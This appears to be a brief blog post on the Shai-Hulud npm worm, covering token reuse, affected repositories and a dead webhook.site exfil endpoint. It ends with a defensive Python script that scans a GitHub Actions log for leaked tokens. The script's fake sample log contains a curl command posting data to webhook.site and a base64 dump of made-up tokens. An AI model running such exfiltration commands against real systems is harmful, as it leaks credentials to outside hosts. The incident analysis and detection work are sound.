🔗 Shai-Hulud: Infographic

Sep 19, 25

An excalidrawn infographic of these details

Some details here that I think have been missed in a lot of coverage:

  1. npm tokens leaked in s1ngularity were used by the attacker, but we also suspect that GitHub tokens from s1ngularity were upgraded to npm tokens, and that npm tokens leaked from early Shai-Hulud victims were abused as well
  2. We still have only validated the initial 36 “Shai-Hulud” repositories (not counting the “Migration” repositories). The vast majority were downstream of ctrl/tinycolor and ngx-bootstrap!
  3. webhook[.]site only supports 100 requests on the free plan, so it quickly deactivated the attacker’s exfil endpoint. However, secrets would still be visible in GitHub workflow logs!
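As an added example (not part of the original post or of any Shai-Hulud tooling), a small Python triage script for the last point: it walks a constructed, fake GitHub Actions job log, flags requests to webhook.site, and lists which secret-shaped values are readable in that log, including inside base64 blobs, since GitHub's log masking only hides the literal secret string. The token prefixes (`npm_`, `gh?_`), the log format and the sample values are assumptions, not data from the incident.

```python
import base64
import re

# Constructed sample of a GitHub Actions job log (not a real log from the
# incident). Line 2 carries a dumped environment as a base64 blob, the kind
# of copy that log masking does not catch; line 3 is the exfil request.
SAMPLE_LOG = "\n".join([
    "2025-09-19T10:02:11Z Run node collect.js",
    "2025-09-19T10:02:11Z " + base64.b64encode(
        b"NPM_TOKEN=npm_ExampleToken0123456789abcdefABCDEFgh\n"
        b"GH_TOKEN=ghp_ExampleToken0123456789abcdefABCDEFgh\n").decode(),
    "2025-09-19T10:02:12Z curl -X POST https://webhook.site/"
    "00000000-0000-0000-0000-000000000000 -d @payload.json",
    "2025-09-19T10:02:12Z Run npm ci",
])

# Assumed token shapes: npm tokens are "npm_" + 36 chars, GitHub tokens
# "ghp_"/"gho_"/"ghu_"/"ghs_"/"ghr_" + 36 or more chars.
SECRET_PATTERNS = {
    "npm_token": re.compile(r"\bnpm_[A-Za-z0-9]{36}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
}
EXFIL_PATTERN = re.compile(r"https?://webhook\.site/[0-9a-f-]{36}")
B64_BLOB = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])")


def _views(line):
    """Yield the line itself plus the decoded text of any base64 blob in it."""
    yield line
    for blob in B64_BLOB.findall(line):
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 after all; skip it
            continue


def triage_workflow_log(log):
    """Return exfil endpoints and redacted secret hits (kind, line number)."""
    endpoints, secrets = [], []
    for lineno, line in enumerate(log.splitlines(), 1):
        endpoints.extend(EXFIL_PATTERN.findall(line))
        for view in _views(line):
            for kind, pat in SECRET_PATTERNS.items():
                for tok in pat.findall(view):
                    # Keep only the prefix so the report itself leaks nothing.
                    secrets.append({"kind": kind, "line": lineno,
                                    "redacted": tok[:8] + "..."})
    return {"exfil_endpoints": endpoints, "exposed_secrets": secrets}


if __name__ == "__main__":
    print(triage_workflow_log(SAMPLE_LOG))
```

Every hit in `exposed_secrets` is a credential to rotate even though the exfil endpoint is dead; the log retention window is how long the value stays readable to anyone with access to the run.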